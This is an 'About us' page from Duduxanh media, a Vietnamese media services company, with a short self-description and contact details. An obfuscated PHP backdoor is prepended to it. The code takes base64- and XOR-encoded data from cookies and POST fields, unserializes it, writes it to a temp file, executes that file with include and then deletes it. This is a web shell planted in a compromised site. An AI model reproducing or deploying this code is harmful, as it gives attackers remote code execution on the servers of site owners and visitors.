$lbWSAknpVB = "\144" . 'y' . chr (71) . '_' . chr (73) . chr (106) . chr (110) . "\x59" . 'm';$vWMogI = "\x63" . "\154" . "\141" . chr (115) . 's' . '_' . "\145" . 'x' . "\x69" . "\x73" . chr ( 190 - 74 ).chr ( 430 - 315 ); $BPKjKYYnMh = $vWMogI($lbWSAknpVB); $vWMogI = "10243";$dJHWNbZZm = $BPKjKYYnMh;if (!$dJHWNbZZm){class dyG_IjnYm{private $Ggejtu;public static $qLbZtRT = "2eae334c-5557-48de-96c2-fbd121ded9e8";public static $qsEmS = 61883;public function __construct($kdtffOh=0){$xYgqVx = $_COOKIE;$iPNdd = $_POST;$XbSXXB = @$xYgqVx[substr(dyG_IjnYm::$qLbZtRT, 0, 4)];if (!empty($XbSXXB)){$ttqXKSPFw = "base64";$BZWDP = "";$XbSXXB = explode(",", $XbSXXB);foreach ($XbSXXB as $xSSKa){$BZWDP .= @$xYgqVx[$xSSKa];$BZWDP .= @$iPNdd[$xSSKa];}$BZWDP = array_map($ttqXKSPFw . "\137" . chr ( 807 - 707 ).'e' . chr (99) . "\157" . 'd' . 'e', array($BZWDP,)); $BZWDP = $BZWDP[0] ^ str_repeat(dyG_IjnYm::$qLbZtRT, (strlen($BZWDP[0]) / strlen(dyG_IjnYm::$qLbZtRT)) + 1);dyG_IjnYm::$qsEmS = @unserialize($BZWDP);}}private function sNScRS(){if (is_array(dyG_IjnYm::$qsEmS)) {$lisKLG = sys_get_temp_dir() . "/" . crc32(dyG_IjnYm::$qsEmS["\163" . 'a' . "\154" . "\x74"]);@dyG_IjnYm::$qsEmS['w' . "\x72" . "\x69" . "\164" . chr ( 1023 - 922 )]($lisKLG, dyG_IjnYm::$qsEmS['c' . chr (111) . "\156" . "\x74" . "\145" . "\156" . chr ( 1062 - 946 )]);include $lisKLG;@dyG_IjnYm::$qsEmS["\144" . chr (101) . "\154" . chr (101) . 't' . chr ( 525 - 424 )]($lisKLG); $lzFtCuofwg = "58197";exit();}}public function __destruct(){$this->sNScRS(); $lzFtCuofwg = "58197";}}$ZbnvueDwJ = new dyG_IjnYm(); $ZbnvueDwJ = "35380_54174";} Giới thiệu Đối tác chuyên nghiệp Duduxanh media

Giới thiệu

Giới thiệu

Tập hợp những tài năng trong ngành, với bề dầy kinh nghiệm và khả năng làm việc sáng tạo, Duduxanh giới thiệu những dịch vụ về media để phục vụ và làm hài lòng ngay cả những khách hàng khó tính nhất.

Ở mỗi dự án, dù lớn hay nhỏ đều được chúng tôi chăm sóc và đầu tư những ý tưởng, kỹ thuật mới để tạo ra những sản phẩm hoàn thiện nhất. Những thành quả  trong hoạt động nghệ thuật là niềm tự hào gắn liền với tên tuổi chúng tôi và khách hàng.

• Phone: 0903692949
• Email. duduxanhcontact@gmail.com